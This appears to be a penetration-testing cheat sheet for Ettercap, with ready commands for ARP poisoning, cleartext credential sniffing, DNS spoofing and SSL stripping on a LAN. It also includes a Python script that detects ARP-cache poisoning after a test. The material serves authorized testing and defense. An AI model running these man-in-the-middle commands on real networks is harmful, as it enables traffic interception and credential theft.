Ettercap Cheat Sheet
LAN MITM framework for ARP poisoning, sniffing, and filter-based traffic manipulation on authorized networks.
Overview
Ettercap performs ARP spoofing and protocol sniffing on switched LANs during authorized internal assessments. Use only on networks where MITM is explicitly permitted.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
```
sudo apt install -y ettercap-text-only ettercap-graphical
```
Essential commands
Text UI
```
sudo ettercap -T
```
ARP poison two hosts (unified sniffing)
```
sudo ettercap -T -M arp:remote /10.10.10.1// /10.10.10.50//
```
Common workflows
Victim 10.10.10.100, gateway 10.10.10.1
```
sudo ettercap -T -q -M arp:remote /10.10.10.1// /10.10.10.100// -i eth0
```
Sniff credentials (cleartext protocols only)
```
sudo ettercap -T -M arp:remote /10.10.10.1// /10.10.10.100// -i eth0
```
DNS spoofing: add the record to /etc/ettercap/etter.dns, then load the plugin
```
*.target.local A 10.10.14.5
```
```
sudo ettercap -T -P dns_spoof -M arp:remote /10.10.10.1// /10.10.10.100//
```
SSL stripping (legacy; HTTPS HSTS limits effectiveness)
```
sudo ettercap -T -M arp:remote /10.10.10.1// /10.10.10.100// -F sslstrip.filter
```
One-shot poison then exit
```
sudo ettercap -T -M arp:remote /10.10.10.1// /10.10.10.100// -i eth0 -s nop
```
Flags reference
| Flag | Meaning |
|---|---|
| -T | Text mode |
| -G | GTK GUI |
| -M MODE | MITM (arp:remote, arp:reply, etc.) |
| -i IF | Interface |
| -q | Quiet |
| -P PLUGIN | Load plugin (dns_spoof, etc.) |
| -F FILE | Filter file |
| // | Target syntax: MAC/IP/range |
| -a | Show local addresses |
| -L FILE | Log PCAP |
Tips
- ARP poisoning is disruptive; coordinate with client and use isolated lab VLANs when possible.
- Modern HTTPS + HSTS reduces credential capture; focus on cleartext, weak TLS, or corporate proxy paths.
- Stop poisoning after test: killall ettercap or Ctrl+C; verify ARP tables recover.
- Prefer Responder/Bettercap for many modern AD attacks; ettercap remains useful for custom filters.
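The last tip says to verify that ARP tables recover after poisoning stops. The script below is an added example, not part of Ettercap or of this cheat sheet: it parses `ip neigh show` output and flags the two cache states ARP poisoning leaves behind, a gateway whose MAC no longer matches a baseline recorded before the test, and one MAC bound to several IPs. The sample output, the baseline MAC and the `check_live_cache` helper name are constructed for illustration; the same check is what a blue team would run on a host to detect poisoning in the first place.

```python
"""Detect ARP-cache anomalies of the kind ARP poisoning leaves behind.

Hypothetical helper (not part of Ettercap): parse `ip neigh show` output
and flag (a) a gateway whose MAC differs from a recorded baseline and
(b) one MAC answering for several IPs. Run it on the victim or gateway
host after the test, or periodically as a lightweight detection.
"""
import re
import subprocess
from collections import defaultdict

# Constructed sample of `ip neigh show` output: 10.10.10.1 is the gateway and
# 10.10.10.50 (the poisoning host) now appears with the same MAC as the gateway.
SAMPLE_NEIGH = """\
10.10.10.1 dev eth0 lladdr aa:bb:cc:00:00:50 REACHABLE
10.10.10.50 dev eth0 lladdr aa:bb:cc:00:00:50 STALE
10.10.10.100 dev eth0 lladdr de:ad:be:ef:01:00 REACHABLE
10.10.10.7 dev eth0  FAILED
"""

# Gateway MAC recorded before the test (constructed value).
BASELINE = {"10.10.10.1": "aa:bb:cc:00:00:01"}

# One neighbour entry; `lladdr` is absent for FAILED/INCOMPLETE entries.
LINE_RE = re.compile(
    r"^(?P<ip>\S+)\s+dev\s+(?P<dev>\S+)"
    r"(?:\s+lladdr\s+(?P<mac>[0-9a-f:]{17}))?\s+(?P<state>\S+)$",
    re.IGNORECASE,
)


def parse_ip_neigh(text):
    """Return a list of (ip, dev, mac, state); mac is None when no lladdr is cached."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            continue  # unrecognised line (e.g. extra flags); skip rather than guess
        mac = m.group("mac").lower() if m.group("mac") else None
        entries.append((m.group("ip"), m.group("dev"), mac, m.group("state")))
    return entries


def find_arp_anomalies(entries, baseline):
    """Return a sorted list of findings; an empty list means the cache matches the baseline."""
    findings = []
    ips_by_mac = defaultdict(set)
    for ip, _dev, mac, _state in entries:
        if mac is None:
            continue
        ips_by_mac[mac].add(ip)
        expected = baseline.get(ip)
        if expected and mac != expected.lower():
            findings.append(
                f"gateway {ip} MAC changed: expected {expected}, cache has {mac}"
            )
    # A single MAC claiming several IPs is the signature of arp:remote poisoning.
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            findings.append(
                f"MAC {mac} is bound to multiple IPs: {', '.join(sorted(ips))}"
            )
    return sorted(findings)


def check_live_cache(baseline):
    """Read the local neighbour cache (Linux `ip` tool) and return its anomalies."""
    out = subprocess.run(
        ["ip", "neigh", "show"], capture_output=True, text=True, check=True
    ).stdout
    return find_arp_anomalies(parse_ip_neigh(out), baseline)


if __name__ == "__main__":
    for finding in find_arp_anomalies(parse_ip_neigh(SAMPLE_NEIGH), BASELINE):
        print(finding)
```

Record the baseline (`ip neigh show` before starting Ettercap) and call `check_live_cache(BASELINE)` after `killall ettercap`; a non-empty result means stale poisoned entries are still in the cache and a gratuitous ARP from the real gateway, or waiting for the entries to age out, is needed before the test is closed.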